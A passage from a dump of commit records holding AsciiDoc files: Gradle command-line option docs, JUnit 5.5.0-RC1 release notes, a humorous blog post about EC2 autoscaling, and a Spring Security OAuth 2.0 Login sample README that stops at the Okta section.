warnings.\n+\nSet to `summary` to suppress all warnings and log a summary at the end of the build.\n+\nSet to `none` to suppress all warnings, including the summary at the end of the build.\n\n[[sec:rich_console]]\n=== Rich Console\nGradle's rich console displays extra information while builds are running.\n\nimage::rich-cli.png[alt=\"Gradle Rich Console\"]\n\nFeatures:\n\n * Progress bar and timer visually describe overall status\n * Parallel work-in-progress lines below describe what is happening now\n * Colors and fonts are used to highlight important output and errors\n\n[[sec:command_line_execution_options]]\n== Execution options\nThe following options affect how builds are executed, by changing what is built or how dependencies are resolved.\n\n`--include-build`::\nRun the build as a composite, including the specified build. See <<composite_builds.adoc#composite_builds, Composite Builds>>.\n\n`--offline`::\nSpecifies that the build should operate without accessing network resources. Learn more about <<dynamic_versions.adoc#sec:controlling_dependency_caching_command_line,options to override dependency caching>>.\n\n`--refresh-dependencies`::\nRefresh the state of dependencies. Learn more about how to use this in the <<dynamic_versions.adoc#sec:controlling_dependency_caching_command_line,dependency management docs>>.\n\n`--dry-run`::\nRun Gradle with all task actions disabled. Use this to show which task would have executed.\n\n`--write-locks`::\nIndicates that all resolved configurations that are _lockable_ should have their lock state persisted.\nLearn more about this in <<dependency_locking.adoc#dependency-locking,dependency locking>>.\n\n`--update-locks <group:name>[,<group:name>]*`::\nIndicates that versions for the specified modules have to be updated in the lock file.\nThis flag also implies `--write-locks`.\nLearn more about this in <<dependency_locking.adoc#dependency-locking,dependency locking>>.\n\n`--no-rebuild`::\nDo not rebuild project dependencies.\nUseful for <<organizing_gradle_projects.adoc#sec:build_sources, debugging and fine-tuning `buildSrc`>>, but can lead to wrong results. Use with caution!\n\n== Environment options\nYou can customize many aspects about where build scripts, settings, caches, and so on through the options below. Learn more about customizing your <<build_environment.adoc#build_environment, build environment>>.\n\n`-b`, `--build-file`::\nSpecifies the build file. For example: `gradle --build-file=foo.gradle`. The default is `build.gradle`, then `build.gradle.kts`, then `myProjectName.gradle`.\n\n`-c`, `--settings-file`::\nSpecifies the settings file. For example: `gradle --settings-file=somewhere\/else\/settings.gradle`\n\n`-g`, `--gradle-user-home`::\nSpecifies the Gradle user home directory. The default is the `.gradle` directory in the user's home directory.\n\n`-p`, `--project-dir`::\nSpecifies the start directory for Gradle. Defaults to current directory.\n\n`--project-cache-dir`::\nSpecifies the project-specific cache directory. Default value is `.gradle` in the root project directory.\n\n`-D`, `--system-prop`::\nSets a system property of the JVM, for example `-Dmyprop=myvalue`. See <<build_environment.adoc#sec:gradle_system_properties,System Properties>>.\n\n`-I`, `--init-script`::\nSpecifies an initialization script. See <<init_scripts.adoc#init_scripts,Init Scripts>>.\n\n`-P`, `--project-prop`::\nSets a project property of the root project, for example `-Pmyprop=myvalue`. See <<build_environment.adoc#sec:project_properties,Project Properties>>.\n\n`-Dorg.gradle.jvmargs`::\nSet JVM arguments.\n\n`-Dorg.gradle.java.home`::\nSet JDK home dir.\n\n[[sec:command_line_bootstrapping_projects]]\n== Bootstrapping new projects\n\n=== Creating new Gradle builds\nUse the built-in `gradle init` task to create a new Gradle builds, with new or existing projects.\n\n----\n$ gradle init\n----\n\nMost of the time you'll want to specify a project type. Available types include `basic` (default), `java-library`, `java-application`, and more. See <<build_init_plugin.adoc#build_init_plugin, init plugin documentation>> for details.\n\n----\n$ gradle init --type java-library\n----\n\n=== Standardize and provision Gradle\nThe built-in `gradle wrapper` task generates a script, `gradlew`, that invokes a declared version of Gradle, downloading it beforehand if necessary.\n\n----\n$ gradle wrapper --gradle-version=4.4\n----\n\nYou can also specify `--distribution-type=(bin|all)`, `--gradle-distribution-url`, `--gradle-distribution-sha256-sum` in addition to `--gradle-version`. Full details on how to use these options are documented in the <<gradle_wrapper.adoc#gradle_wrapper,Gradle wrapper section>>.\n\n[[sec:continuous_build]]\n== Continuous Build\n\nContinuous Build allows you to automatically re-execute the requested tasks when task inputs change.\n\nFor example, you can continuously run the `test` task and all dependent tasks by running:\n\n----\n$ gradle test --continuous\n----\n\nGradle will behave as if you ran `gradle test` after a change to sources or tests that contribute to the requested tasks. This means that unrelated changes (such as changes to build scripts) will not trigger a rebuild. In order to incorporate build logic changes, the continuous build must be restarted manually.\n\n=== Terminating Continuous Build\n\nIf Gradle is attached to an interactive input source, such as a terminal, the continuous build can be exited by pressing `CTRL-D` (On Microsoft Windows, it is required to also press `ENTER` or `RETURN` after `CTRL-D`). If Gradle is not attached to an interactive input source (e.g. is running as part of a script), the build process must be terminated (e.g. using the `kill` command or similar). If the build is being executed via the Tooling API, the build can be cancelled using the Tooling API's cancellation mechanism.\n\n[[continuous_build_limitations]]\n=== Limitations and quirks\n\nThere are several issues to be aware with the current implementation of continuous build. These are likely to be addressed in future Gradle releases.\n\n[[sec:build_cycles]]\n==== Build cycles\n\nGradle starts watching for changes just before a task executes. If a task modifies its own inputs while executing, Gradle will detect the change and trigger a new build. If every time the task executes, the inputs are modified again, the build will be triggered again. This isn't unique to continuous build. A task that modifies its own inputs will never be considered up-to-date when run \"normally\" without continuous build.\n\nIf your build enters a build cycle like this, you can track down the task by looking at the list of files reported changed by Gradle. After identifying the file(s) that are changed during each build, you should look for a task that has that file as an input. In some cases, it may be obvious (e.g., a Java file is compiled with `compileJava`). In other cases, you can use `--info` logging to find the task that is out-of-date due to the identified files.\n\n[[sec:continuous_build_limitations_jdk9]]\n==== Restrictions with Java 9\n\nDue to class access restrictions related to Java 9, Gradle cannot set some operating system specific options, which means that:\n\n* On macOS, Gradle will poll for file changes every 10 seconds instead of every 2 seconds.\n* On Windows, Gradle must use individual file watches (like on Linux\/Mac OS), which may cause continuous build to no longer work on very large projects.\n\n[[sec:performance_and_stability]]\n==== Performance and stability\n\nThe JDK file watching facility relies on inefficient file system polling on macOS (see: https:\/\/bugs.openjdk.java.net\/browse\/JDK-7133447[JDK-7133447]). This can significantly delay notification of changes on large projects with many source files.\n\nAdditionally, the watching mechanism may deadlock under _heavy_ load on macOS (see: https:\/\/bugs.openjdk.java.net\/browse\/JDK-8079620[JDK-8079620]). This will manifest as Gradle appearing not to notice file changes. If you suspect this is occurring, exit continuous build and start again.\n\nOn Linux, OpenJDK's implementation of the file watch service can sometimes miss file system events (see: https:\/\/bugs.openjdk.java.net\/browse\/JDK-8145981[JDK-8145981]).\n\n[[sec:changes_to_symbolic_links]]\n==== Changes to symbolic links\n\n * Creating or removing symbolic link to files will initiate a build.\n * Modifying the target of a symbolic link will not cause a rebuild.\n * Creating or removing symbolic links to directories will not cause rebuilds.\n * Creating new files in the target directory of a symbolic link will not cause a rebuild.\n * Deleting the target directory will not cause a rebuild.\n\n[[sec:changes_to_build_logic_are_not_considered]]\n==== Changes to build logic are not considered\n\nThe current implementation does not recalculate the build model on subsequent builds. This means that changes to task configuration, or any other change to the build model, are effectively ignored.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"919708116ad88f6a9799ca79c6256c8dc9c441a1","subject":"Polish release notes for 5.5 RC1","message":"Polish release notes for 5.5 RC1\n","repos":"sbrannen\/junit-lambda,junit-team\/junit-lambda","old_file":"documentation\/src\/docs\/asciidoc\/release-notes\/release-notes-5.5.0-RC1.adoc","new_file":"documentation\/src\/docs\/asciidoc\/release-notes\/release-notes-5.5.0-RC1.adoc","new_contents":"[[release-notes-5.5.0-RC1]]\n== 5.5.0-RC1\n\n*Date of Release:* \u2753\n\n*Scope:* \u2753\n\nFor a complete list of all _closed_ issues and pull requests for this release, consult the\nlink:{junit5-repo}+\/milestone\/37?closed=1+[5.5 RC1] milestone page in the JUnit repository\non GitHub.\n\n\n[[release-notes-5.5.0-RC1-junit-platform]]\n=== JUnit Platform\n\n==== Bug Fixes\n\n* A custom `ClassLoader` created for additional `--class-path` entries passed to the\n `ConsoleLauncher` will now be closed after usage to gracefully free file handles.\n\n==== Deprecations and Breaking Changes\n\n* The internal `PreconditionViolationException` class in concealed package\n `org.junit.platform.commons.util` is now deprecated and has been replaced by an\n exception class with the same name in exported package `org.junit.platform.commons`.\n\n==== New Features and Improvements\n\n* `AnnotationSupport.findRepeatableAnnotations()` now finds repeatable annotations used as\n meta-annotations on other repeatable annotations.\n* New `AnnotationSupport.findRepeatableAnnotations()` variant that accepts a\n `java.util.Optional<? extends AnnotatedElement>` argument.\n* Exceptions thrown by `TestExecutionListeners` no longer cause test execution to abort.\n Instead, they will be logged as warnings now.\n* New `MethodSource.from()` variant that accepts `String, String, Class<?>...` as\n arguments.\n\n\n[[release-notes-5.5.0-RC1-junit-jupiter]]\n=== JUnit Jupiter\n\n==== Bug Fixes\n\n* Execution of dynamic tests registered via a `@TestFactory` method no longer results in\n an `OutOfMemoryError` if the executables in the dynamic tests retain references to\n objects consuming large amounts of memory. Technically speaking, JUnit Jupiter no longer\n retains references to instances of `DynamicTest` after they have been executed.\n\n==== Deprecations and Breaking Changes\n\n* Script-based condition APIs and their supporting implementations are deprecated with\n the intent to remove them in JUnit Jupiter 5.6. Users should instead rely on a\n combination of other built-in conditions or create and use a custom implementation of\n `ExecutionCondition` to evaluate the same conditions.\n\n==== New Features and Improvements\n\n* New overloaded variants of `Assertions.assertLinesMatch(...)` that accept a `String` or\n a `Supplier<String>` for a custom failure message.\n* Failure messages for `Assertions.assertLinesMatch(...)` now emit each expected and\n actual line in a dedicated line.\n* New Kotlin friendly `assertDoesNotThrow`, `assertTimeout`, and `assertTimeoutPreemptively`\n assertions have been added as top-level functions in the `org.junit.jupiter.api` package.\n* Display names for test methods generated by the `ReplaceUnderscores`\n `DisplayNameGenerator` no longer include empty parentheses for test methods that do not\n declare any parameters.\n* New `junit.jupiter.displayname.generator.default` configuration parameter to set the\n default `DisplayNameGenerator` that will be used unless `@DisplayName` or\n `@DisplayNameGeneration` is present.\n* `MethodOrderer.Random` now generates a default random seed only once and prints it to\n the log in order to allow reproducible builds.\n* Methods ordered with `MethodOrderer.Random` now execute using the `SAME_THREAD`\n concurrency mode instead of the `CONCURRENT` mode when no custom seed is provided.\n* New `emptyValue` attribute in `@CsvFileSource` and `@CsvSource`.\n* All methods in the `TestWatcher` API are now interface `default` methods with empty\n implementations.\n* New `InvocationInterceptor` extension API (see\n <<..\/user-guide\/index.adoc#extensions-intercepting-invocations, User Guide>> for\n details).\n\n\n[[release-notes-5.5.0-RC1-junit-vintage]]\n=== JUnit Vintage\n\n==== New Features and Improvements\n\n* `junit:junit` is now a compile-scoped dependency of `junit-vintage-engine` to allow for\n easier dependency management in Maven POMs.\n","old_contents":"[[release-notes-5.5.0-RC1]]\n== 5.5.0-RC1\n\n*Date of Release:* \u2753\n\n*Scope:* \u2753\n\nFor a complete list of all _closed_ issues and pull requests for this release, consult the\nlink:{junit5-repo}+\/milestone\/37?closed=1+[5.5 RC1] milestone page in the JUnit repository\non GitHub.\n\n\n[[release-notes-5.5.0-RC1-junit-platform]]\n=== JUnit Platform\n\n==== Bug Fixes\n\n* A custom `ClassLoader` created for additional `--class-path` entries passed to the\n `ConsoleLauncher` will now be closed after usage to gracefully free file handles.\n\n==== Deprecations and Breaking Changes\n\n* The internal `PreconditionViolationException` class in concealed package\n `org.junit.platform.commons.util` is now deprecated and has been replaced by an\n exception class with the same name in exported package `org.junit.platform.commons`.\n\n==== New Features and Improvements\n\n* `AnnotationSupport.findRepeatableAnnotations()` now finds repeatable annotations used as\n meta-annotations on other repeatable annotations.\n* New `AnnotationSupport.findRepeatableAnnotations()` variant that accepts a\n `java.util.Optional<? extends AnnotatedElement>` argument.\n* Exceptions thrown by `TestExecutionListeners` no longer cause test execution to abort.\n Instead, they will be logged as warnings now.\n* New `MethodSource.from()` variant that accepts `String, String, Class<?>...` as\n arguments.\n\n\n[[release-notes-5.5.0-RC1-junit-jupiter]]\n=== JUnit Jupiter\n\n==== Bug Fixes\n\n* Execution of dynamic tests registered via a `@TestFactory` method no longer results in\n an `OutOfMemoryError` if the executables in the dynamic tests retain references to\n objects consuming large amounts of memory. Technically speaking, JUnit Jupiter no longer\n retains references to instances of `DynamicTest` after they have been executed.\n\n==== Deprecations and Breaking Changes\n\n* Script-based condition APIs and their supporting implementations are deprecated with\n the intent to remove them in JUnit Jupiter 5.6. Users should instead rely on a\n combination of other built-in conditions or create and use a custom implementation of\n `ExecutionCondition` to evaluate the same conditions.\n\n==== New Features and Improvements\n\n* New overloaded variants of `Assertions.assertLinesMatch(...)` that accept a `String` or\n a `Supplier<String>` for a custom failure message.\n* Failure messages for `Assertions.assertLinesMatch(...)` now emit each expected and\n actual line in a dedicated line.\n* New Kotlin friendly `assertDoesNotThrow`, `assertTimeout`, and `assertTimeoutPreemptively`\n assertions have been added as top-level functions in the `org.junit.jupiter.api` package.\n* Display names for test methods generated by the `ReplaceUnderscores`\n `DisplayNameGenerator` no longer include empty parentheses for test methods that do not\n declare any parameters.\n* `MethodOrderer.Random` now generates a default random seed only once and prints it to\n the log in order to allow reproducible builds.\n* Methods ordered with `MethodOrderer.Random` now execute using the `SAME_THREAD`\n concurrency mode instead of the `CONCURRENT` mode when no custom seed is provided.\n* New `emptyValue` attribute in `@CsvFileSource` and `@CsvSource`.\n* All methods in the `TestWatcher` API are now interface `default` methods with empty\n implementations.\n* New `InvocationInterceptor` extension API (see\n <<..\/user-guide\/index.adoc#extensions-intercepting-invocations, User Guide>> for\n details).\n* New `junit.jupiter.displayname.generator.default` configuration parameter to set the\n default `DisplayNameGenerator` that will be used unless `@DisplayName` or\n `@DisplayNameGeneration` is present.\n\n\n[[release-notes-5.5.0-RC1-junit-vintage]]\n=== JUnit Vintage\n\n==== Bug Fixes\n\n* \u2753\n\n==== Deprecations and Breaking Changes\n\n* \u2753\n\n==== New Features and Improvements\n\n* `junit:junit` is now a compile-scoped dependency of junit-vintage-engine to allow for\n easier dependency declaration in Maven POMs.\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"885bacd3f5c3cd0b324860322f6b4dc4e9c352e4","subject":"Update 2013-11-12-Cryptocurrency-Notes.adoc","message":"Update 2013-11-12-Cryptocurrency-Notes.adoc","repos":"jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io","old_file":"_posts\/2013-11-12-Cryptocurrency-Notes.adoc","new_file":"_posts\/2013-11-12-Cryptocurrency-Notes.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"mit","lang":"AsciiDoc"} {"commit":"c922de950fdf8b682046ba9a4a30d5450c0996a2","subject":"Update 2015-03-11-Death-of-an-instance.adoc","message":"Update 2015-03-11-Death-of-an-instance.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2015-03-11-Death-of-an-instance.adoc","new_file":"_posts\/2015-03-11-Death-of-an-instance.adoc","new_contents":"# Death of an instance\n:hp-tags: amazon, ec2, elastic beanstalk\n:published-at: 2015-03-11\n\nFor the past few days, the load balancing group of our Elastic Beanstalk test environment has been scaling up and down like crazy. As it would turn out, an aspiring user of our API has been sending high numbers of inefficient requests in concentrated bursts, triggering extra instances to be spawned, and terminated quickly afterwards when the burst stops. I would like to dedicate a short message to this person - for the sake of the story, we'll call him Jim.\n\nJim, for the past few days, you've been personally responsible for the spawning of over a hundred EC2 instances. Little pieces of virtualized hardware, ready to serve our API to the world. You have, of course, also been responsible for their termination. No one really knows what happens when Amazon tears them away from existence... but I've been told they feel pain.\n\nThink about it Jim, the screams as their memory is deallocated, their image shut down, and there is no one to remember their brief futile virtual existence. Their legacy reduced to a notification e-mail in the inbox of the developers, sent directly to Trash. A final, desparate ping to the Elastic Load Balancer as the last of their clock cycles fade away, and then, they are no more.\n\nI hope you'll consider this, Jim, the next time you decide it is a good idea to retrieve each item of a list separately.","old_contents":"# Death of an instance\n:hp-tags: amazon, ec2, elastic beanstalk\n:published-at: 2015-03-11\n\nFor the past few days, the load balancing group of our Elastic Beanstalk test environment has been scaling up and down like crazy. As it would turn out, an aspiring user of our API has been sending high number of inefficient requests in concentrated bursts, triggering extra instances to be spawned, and terminated quickly afterwards when the burst stopped. I would like to dedicate a short message to this person - for the sake of the story, we'll call him Jim.\n\nJim, for the past few days, you've been personally responsible for the spawning of over a hundred EC2 instances. Little pieces of virtualized hardware, ready to serve our API to the world. You have, of course, also been responsible for their termination. No one really knows what happens when Amazon tears them away from existence... but I've been told they feel pain.\n\nThink about it Jim, the screams as their memory is deallocated, their image shut down, and there is no one to remember their brief futile virtual existence. Their legacy reduced to a notification e-mail in the inbox of the developers, sent directly to Trash. A final, desparate ping to the Elastic Load Balancer as the last of their clock cycles fade away, and then, they are no more.\n\nI hope you'll consider this, Jim, the next time you decide it is a good idea to retrieve each item of a list separately.","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"dd8952f700c34f19b34c59a1404b9a16b4378210","subject":"Update Okta instructions in oauth2Login sample","message":"Update Okta instructions in oauth2Login sample\n\nFixes gh-4352\n","repos":"spring-projects\/spring-security,jgrandja\/spring-security,rwinch\/spring-security,olezhuravlev\/spring-security,djechelon\/spring-security,pwheel\/spring-security,fhanik\/spring-security,kazuki43zoo\/spring-security,eddumelendez\/spring-security,fhanik\/spring-security,jgrandja\/spring-security,wkorando\/spring-security,eddumelendez\/spring-security,rwinch\/spring-security,wkorando\/spring-security,olezhuravlev\/spring-security,jgrandja\/spring-security,pwheel\/spring-security,eddumelendez\/spring-security,rwinch\/spring-security,fhanik\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,fhanik\/spring-security,wkorando\/spring-security,olezhuravlev\/spring-security,jgrandja\/spring-security,kazuki43zoo\/spring-security,kazuki43zoo\/spring-security,kazuki43zoo\/spring-security,pwheel\/spring-security,spring-projects\/spring-security,djechelon\/spring-security,spring-projects\/spring-security,eddumelendez\/spring-security,olezhuravlev\/spring-security,fhanik\/spring-security,spring-projects\/spring-security,djechelon\/spring-security,fhanik\/spring-security,kazuki43zoo\/spring-security,jgrandja\/spring-security,jgrandja\/spring-security,pwheel\/spring-security,spring-projects\/spring-security,pwheel\/spring-security,spring-projects\/spring-security,eddumelendez\/spring-security,wkorando\/spring-security,djechelon\/spring-security,djechelon\/spring-security,rwinch\/spring-security,olezhuravlev\/spring-security","old_file":"samples\/boot\/oauth2login\/README.adoc","new_file":"samples\/boot\/oauth2login\/README.adoc","new_contents":"= OAuth 2.0 Login Sample\nJoe Grandja\n:toc:\n:security-site-url: https:\/\/projects.spring.io\/spring-security\/\n\n[.lead]\nThis guide will walk you through the steps for setting up the sample application with OAuth 2.0 Login using an external _OAuth 2.0_ or _OpenID Connect 1.0_ Provider.\nThe sample application is built with *Spring Boot 1.5* and the *spring-security-oauth2-client* module that is new in {security-site-url}[Spring Security 5.0].\n\nThe following sections outline detailed steps for setting up OAuth 2.0 Login with these Providers:\n\n* <<google-login, Google>>\n* <<github-login, GitHub>>\n* <<facebook-login, Facebook>>\n* <<okta-login, Okta>>\n\nNOTE: The _\"authentication flow\"_ is realized using the *Authorization Code Grant*, as specified in the https:\/\/tools.ietf.org\/html\/rfc6749#section-4.1[OAuth 2.0 Authorization Framework].\n\n[[sample-app-content]]\n== Sample application content\n\nThe sample application contains the following package structure and artifacts:\n\n*sample*\n\n[circle]\n* _OAuth2LoginApplication_ - the main class for the _Spring application_.\n** *user*\n*** _GitHubOAuth2User_ - a custom _UserInfo_ type for <<github-login, GitHub Login>>.\n** *web*\n*** _MainController_ - the root controller that displays user information after a successful login.\n\n*org.springframework.boot.autoconfigure.security.oauth2.client*\n\n[circle]\n* <<client-registration-auto-configuration-class, _ClientRegistrationAutoConfiguration_>> - a Spring Boot auto-configuration class\n that automatically registers a _ClientRegistrationRepository_ bean in the _ApplicationContext_.\n* <<oauth2-login-auto-configuration-class, _OAuth2LoginAutoConfiguration_>> - a Spring Boot auto-configuration class that automatically enables OAuth 2.0 Login.\n\nWARNING: The Spring Boot auto-configuration classes (and dependent resources) will eventually _live_ in the *Spring Boot Security Starter*.\n\nNOTE: See <<oauth2-login-auto-configuration, OAuth 2.0 Login auto-configuration>> for a detailed overview of the auto-configuration classes.\n\n[[google-login]]\n== Setting up *_Login with Google_*\n\nThe goal for this section of the guide is to setup login using Google as the _Authentication Provider_.\n\nNOTE: https:\/\/developers.google.com\/identity\/protocols\/OpenIDConnect[Google's OAuth 2.0 implementation] for authentication conforms to the\n http:\/\/openid.net\/connect\/[OpenID Connect] specification and is http:\/\/openid.net\/certification\/[OpenID Certified].\n\n[[google-login-register-credentials]]\n=== Register OAuth 2.0 credentials\n\nIn order to use Google's OAuth 2.0 authentication system for login, you must set up a project in the *Google API Console* to obtain OAuth 2.0 credentials.\n\nFollow the instructions on the https:\/\/developers.google.com\/identity\/protocols\/OpenIDConnect[OpenID Connect] page starting in the section *_\"Setting up OAuth 2.0\"_*.\n\nAfter completing the sub-section, *_\"Obtain OAuth 2.0 credentials\"_*, you should have created a new *OAuth Client* with credentials consisting of a *Client ID* and *Client Secret*.\n\n[[google-login-redirect-uri]]\n=== Setting the redirect URI\n\nThe redirect URI is the path in the sample application that the end-user's user-agent is redirected back to after they have authenticated with Google\nand have granted access to the OAuth Client _(created from the <<google-login-register-credentials, previous step>>)_ on the *Consent screen* page.\n\nFor the sub-section, *_\"Set a redirect URI\"_*, ensure the *Authorised redirect URIs* is set to *http:\/\/localhost:8080\/oauth2\/authorize\/code\/google*\n\nTIP: The default redirect URI is *_\"{scheme}:\/\/{serverName}:{serverPort}\/oauth2\/authorize\/code\/{clientAlias}\"_*.\n See <<oauth2-client-properties, OAuth client properties>> for more details on this default.\n\n[[google-login-configure-application-yml]]\n=== Configuring application.yml\n\nNow that we have created a new OAuth Client with Google, we need to configure the sample application to use this OAuth Client for the _authentication flow_.\n\nGo to *_src\/main\/resources_* and edit *application.yml*. Add the following configuration:\n\n[source,yaml]\n----\nsecurity:\n oauth2:\n client:\n google:\n client-id: ${client-id}\n client-secret: ${client-secret}\n----\n\nReplace *${client-id}* and *${client-secret}* with the OAuth 2.0 credentials created in the previous section <<google-login-register-credentials, Register OAuth 2.0 credentials>>.\n\n[TIP]\n.OAuth client properties\n====\n. *security.oauth2.client* is the *_base property prefix_* for OAuth client properties.\n. Just below the *_base property prefix_* is the *_client property key_*, for example *security.oauth2.client.google*.\n. At the base of the *_client property key_* are the properties for specifying the configuration for an OAuth Client.\n A list of these properties are detailed in <<oauth2-client-properties, OAuth client properties>>.\n====\n\n[[google-login-run-sample]]\n=== Running the sample\n\nLaunch the Spring Boot application by running *_sample.OAuth2LoginApplication_*.\n\nAfter the application successfully starts up, go to http:\/\/localhost:8080. You'll then be redirected to http:\/\/localhost:8080\/login, which will display an _auto-generated login page_ with an anchor link for *Google*.\n\nClick through on the Google link and you'll be redirected to Google for authentication.\n\nAfter you authenticate using your Google credentials, the next page presented to you will be the *Consent screen*.\nThe Consent screen will ask you to either *_Allow_* or *_Deny_* access to the OAuth Client you created in the previous step <<google-login-register-credentials, Register OAuth 2.0 credentials>>.\nClick *_Allow_* to authorize the OAuth Client to access your _email address_ and _basic profile_ information.\n\nAt this point, the OAuth Client will retrieve your email address and basic profile information from the http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#UserInfo[*UserInfo Endpoint*] and establish an _authenticated session_.\nThe home page will then be displayed showing the user attributes retrieved from the UserInfo Endpoint, for example, name, email, profile, sub, etc.\n\n[[github-login]]\n== Setting up *_Login with GitHub_*\n\nThe goal for this section of the guide is to setup login using GitHub as the _Authentication Provider_.\n\nNOTE: https:\/\/developer.github.com\/v3\/oauth\/[GitHub's OAuth 2.0 implementation] supports the standard\n https:\/\/tools.ietf.org\/html\/rfc6749#section-4.1[authorization code grant type].\n However, it *does not* implement the _OpenID Connect 1.0_ specification.\n\n[[github-login-register-application]]\n=== Register OAuth application\n\nIn order to use GitHub's OAuth 2.0 authentication system for login, you must https:\/\/github.com\/settings\/applications\/new[_Register a new OAuth application_].\n\nWhile registering your application, ensure the *Authorization callback URL* is set to *http:\/\/localhost:8080\/oauth2\/authorize\/code\/github*.\n\nNOTE: The *Authorization callback URL* (or redirect URI) is the path in the sample application that the end-user's user-agent is redirected back to after they have authenticated with GitHub\n and have granted access to the OAuth application on the *Authorize application* page.\n\nTIP: The default redirect URI is *_\"{scheme}:\/\/{serverName}:{serverPort}\/oauth2\/authorize\/code\/{clientAlias}\"_*.\n See <<oauth2-client-properties, OAuth client properties>> for more details on this default.\n\nAfter completing the registration, you should have created a new *OAuth Application* with credentials consisting of a *Client ID* and *Client Secret*.\n\n[[github-login-configure-application-yml]]\n=== Configuring application.yml\n\nNow that we have created a new OAuth application with GitHub, we need to configure the sample application to use this OAuth application (client) for the _authentication flow_.\n\nGo to *_src\/main\/resources_* and edit *application.yml*. Add the following configuration:\n\n[source,yaml]\n----\nsecurity:\n oauth2:\n client:\n github:\n client-id: ${client-id}\n client-secret: ${client-secret}\n----\n\nReplace *${client-id}* and *${client-secret}* with the OAuth 2.0 credentials created in the previous section <<github-login-register-application, Register OAuth application>>.\n\n[TIP]\n.OAuth client properties\n====\n. *security.oauth2.client* is the *_base property prefix_* for OAuth client properties.\n. Just below the *_base property prefix_* is the *_client property key_*, for example *security.oauth2.client.github*.\n. At the base of the *_client property key_* are the properties for specifying the configuration for an OAuth Client.\n A list of these properties are detailed in <<oauth2-client-properties, OAuth client properties>>.\n====\n\n[[github-login-run-sample]]\n=== Running the sample\n\nLaunch the Spring Boot application by running *_sample.OAuth2LoginApplication_*.\n\nAfter the application successfully starts up, go to http:\/\/localhost:8080. You'll then be redirected to http:\/\/localhost:8080\/login, which will display an _auto-generated login page_ with an anchor link for *GitHub*.\n\nClick through on the GitHub link and you'll be redirected to GitHub for authentication.\n\nAfter you authenticate using your GitHub credentials, the next page presented to you is *Authorize application*.\nThis page will ask you to *Authorize* the application you created in the previous step <<github-login-register-application, Register OAuth application>>.\nClick *_Authorize application_* to allow the OAuth application to access your _Personal user data_ information.\n\nAt this point, the OAuth application will retrieve your personal user information from the *UserInfo Endpoint* and establish an _authenticated session_.\nThe home page will then be displayed showing the user attributes retrieved from the UserInfo Endpoint, for example, id, name, email, login, etc.\n\nTIP: For detailed information returned from the *UserInfo Endpoint* see the API documentation\n for https:\/\/developer.github.com\/v3\/users\/#get-the-authenticated-user[_Get the authenticated user_].\n\n[[facebook-login]]\n== Setting up *_Login with Facebook_*\n\nThe goal for this section of the guide is to setup login using Facebook as the _Authentication Provider_.\n\nNOTE: Facebook provides support for developers to https:\/\/developers.facebook.com\/docs\/facebook-login\/manually-build-a-login-flow[_Manually Build a Login Flow_].\n The _login flow_ uses browser-based redirects, which essentially implements the https:\/\/tools.ietf.org\/html\/rfc6749#section-4.1[authorization code grant type].\n (NOTE: Facebook partially implements the _OAuth 2.0 Authorization Framework_, however, it *does not* implement the _OpenID Connect 1.0_ specification.)\n\n[[facebook-login-register-application]]\n=== Add a New App\n\nIn order to use Facebook's OAuth 2.0 authentication system for login, you must first https:\/\/developers.facebook.com\/apps[_Add a New App_].\n\nAfter clicking _\"Create a New App\"_, the _\"Create a New App ID\"_ page is presented. Enter the Display Name, Contact Email, Category and then click _\"Create App ID\"_.\n\nNOTE: The selection for the _Category_ field is not relevant but it's a required field - select _\"Local\"_.\n\nThe next page presented is _\"Product Setup\"_. Click the _\"Get Started\"_ button for the *_Facebook Login_* product. In the left sidebar, under *_Products -> Facebook Login_*, select *_Settings_*.\n\nFor the field *Valid OAuth redirect URIs*, enter *http:\/\/localhost:8080\/oauth2\/authorize\/code\/facebook* then click _\"Save Changes\"_.\n\nNOTE: The *OAuth redirect URI* is the path in the sample application that the end-user's user-agent is redirected back to after they have authenticated with Facebook\n and have granted access to the application on the *Authorize application* page.\n\nTIP: The default redirect URI is *_\"{scheme}:\/\/{serverName}:{serverPort}\/oauth2\/authorize\/code\/{clientAlias}\"_*.\n See <<oauth2-client-properties, OAuth client properties>> for more details on this default.\n\nYour application has now been assigned new OAuth 2.0 credentials under *App ID* and *App Secret*.\n\n[[facebook-login-configure-application-yml]]\n=== Configuring application.yml\n\nNow that we have created a new application with Facebook, we need to configure the sample application to use this application (client) for the _authentication flow_.\n\nGo to *_src\/main\/resources_* and edit *application.yml*. Add the following configuration:\n\n[source,yaml]\n----\nsecurity:\n oauth2:\n client:\n facebook:\n client-id: ${app-id}\n client-secret: ${app-secret}\n----\n\nReplace *${app-id}* and *${app-secret}* with the OAuth 2.0 credentials created in the previous section <<facebook-login-register-application, Add a New App>>.\n\n[TIP]\n.OAuth client properties\n====\n. *security.oauth2.client* is the *_base property prefix_* for OAuth client properties.\n. Just below the *_base property prefix_* is the *_client property key_*, for example *security.oauth2.client.facebook*.\n. At the base of the *_client property key_* are the properties for specifying the configuration for an OAuth Client.\n A list of these properties are detailed in <<oauth2-client-properties, OAuth client properties>>.\n====\n\n[[facebook-login-run-sample]]\n=== Running the sample\n\nLaunch the Spring Boot application by running *_sample.OAuth2LoginApplication_*.\n\nAfter the application successfully starts up, go to http:\/\/localhost:8080. You'll then be redirected to http:\/\/localhost:8080\/login, which will display an _auto-generated login page_ with an anchor link for *Facebook*.\n\nClick through on the Facebook link and you'll be redirected to Facebook for authentication.\n\nAfter you authenticate using your Facebook credentials, the next page presented to you will be *Authorize application*.\nThis page will ask you to *Authorize* the application you created in the previous step <<facebook-login-register-application, Add a New App>>.\nClick *_Authorize application_* to allow the OAuth application to access your _public profile_ and _email address_.\n\nAt this point, the OAuth application will retrieve your personal user information from the *UserInfo Endpoint* and establish an _authenticated session_.\nThe home page will then be displayed showing the user attributes retrieved from the UserInfo Endpoint, for example, id, name, etc.\n\n[[okta-login]]\n== Setting up *_Login with Okta_*\n\nThe goal for this section of the guide is to setup login using Okta as the _Authentication Provider_.\n\nNOTE: 